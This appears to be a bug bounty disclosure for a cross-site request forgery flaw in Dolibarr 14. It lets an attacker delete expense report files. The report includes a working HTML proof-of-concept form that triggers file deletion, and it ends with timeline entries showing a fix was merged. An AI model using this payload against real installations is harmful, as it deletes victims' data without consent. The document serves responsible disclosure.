Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid

Reported on

Jul 21st 2021


✍️ Description

In HRM --> Expenses reports Directory, you don't protect files built by mass actions to delete with CSRF attacks then attacker able to delete arbitrary reports only with knowing their names.

🕵️‍♂️ Proof of Concept

// PoC.html


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.dolibarr.org/expensereport/list.php">
      <input type="hidden" name="sortfield" value="d&#46;date&#95;debut" />
      <input type="hidden" name="sortorder" value="DESC" />
      <input type="hidden" name="contextpage" value="expensereportlist" />
      <input type="hidden" name="search&#95;user" value="&#45;1" />
      <input type="hidden" name="action" value="remove&#95;file" />
      <input type="hidden" name="file" value="note&#95;de&#95;frais&#95;20210411024804&#46;pdf" />
      <input type="hidden" name="contextpage" value="expensereportlist" />
      <input type="hidden" name="search&#95;user" value="&#45;1" />
      <input type="hidden" name="entity" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>




💥 Impact

This vulnerability is capable of delete mentioned files . version of application == 14 (tested on demo website)

We have contacted a member of the dolibarr team and are waiting to hear back a year ago
amammad modified the report
a year ago
amammad modified the report
a year ago
Laurent Destailleur confirmed that a fix has been merged on c3e885 a year ago
Laurent Destailleur has been awarded the fix bounty
to join this conversation